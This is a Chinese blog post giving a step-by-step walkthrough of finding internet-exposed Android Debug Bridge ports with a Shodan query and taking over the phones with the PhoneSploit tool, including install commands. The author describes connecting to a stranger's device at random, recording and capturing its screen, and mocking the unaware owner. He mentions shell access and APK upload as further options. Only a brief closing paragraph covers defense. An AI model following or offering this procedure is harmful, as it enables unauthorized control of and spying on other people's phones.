【phonesploit】利用usb网络调试控制安卓设备

# 概述: 当大多数安卓开启usb调试会默认开启usb网络调试,这会把你的安卓设备暴露在公网上,本文将演示如何使用Shodan扫描暴露在网络上的Adb(Android Debug Bridge)并控制安卓设备。 ## 一、...

概述:

当大多数安卓开启usb调试会默认开启usb网络调试,这会把你的安卓设备暴露在公网上,本文将演示如何安全工具【phonesploit】以及Shodan扫描暴露在网络上的Adb(Android Debug Bridge)并控制安卓设备。

一、准备阶段:

安全工具:phonesploit
搜索引擎:shodan
需要条件:安卓开启usb网络调试

注:大多数安卓手机开启usb调试时会默认开启usb网络调试注:大多数安卓手机开启usb调试时会默认开启usb网络调试

二、下载工具:

我使用的是kali linux系统,以下为linux中phonesploit安装代码

LINUX:

git clone https://github.com/01010000-kumar/PhoneSploit
cd PhoneSploit
pip install colorama
python2 main_linux.py

注:运行pip install colorama时,可能会遇到依赖问题
所以,需要使用命令先安装pip,再安装colorama
python2:sudo apt install python-pip
python3:sudo apt install python3-pip

WINDOWS:

git clone https://github.com/01010000-kumar/PhoneSploit

macOS:

brew install git python@3
git clone https://github.com/01010000-kumar/PhoneSploit
cd PhoneSploit
python3 -m pip install colorama
python3 phonesploit.py

安装完成进入后你将看到以下画面:

三、利用阶段:

使用shodan搜索:

"Android Debug Bridge" "Device" port:5555 country:"TW"

Android Debug Bridge 是指安卓调试
"Device" 是指设备
port:5555 是adb调试的端口
country:"TW" 是搜索台湾设备,根据自己需要更换其他国家
如下,搜索出台湾网络上的安卓设备

接下来,我随便选择一个韩国IP粘贴后回车进行连接,连接成功结果如下:

注:有的设备没有在线,会连接失败,多尝试其他ip

phonesploit功能如下:

中文翻译:

我这里选择第 [6] Screen record a phone 进行录制手机测试:
提示代码phonesploit(main_menu) > 时,输入数字 6
提示代码[+]Enter where you would like the screenshot to be saved.[Default: present working directory]
└──>phonesploit(screenshot) > 时,敲击回车默认保存在工具目录下

这时文件已经保存在了phonesploit目录下

注:我之前尝试了很多次都保存失败了,那是因为phonesploit没有在root下运行,再测试输入7 进行屏幕截图抓取

这人搁这在看电视呢,丝毫不知道我已经控制了他的安卓设备。

除了能截图,还可以shell安卓设备、录制视频、上传apk等等.....
既然公网能使用phonesploit利用usb网络调试控制安卓,那内网也应该能利用并控制,这个我没有测试。

如何防范:

这次能控制安卓设备最主要的原因是开启了usb网络调试,据我所知,大多数安卓开启usb调试会默认开启usb网络调试,这会把你的安卓设备暴露在公网上。usb网络调试需要通过adb命令关闭(略微麻烦),所以在不用usb调试时关闭它,这样你的安卓设备就安全了许多。

  • 发表于 2021-04-27 18:43:23
  • 阅读 ( 8557 )
  • 分类:安全工具

0 条评论

请先 登录 后评论
三大八项
三大八项

1 篇文章

站长统计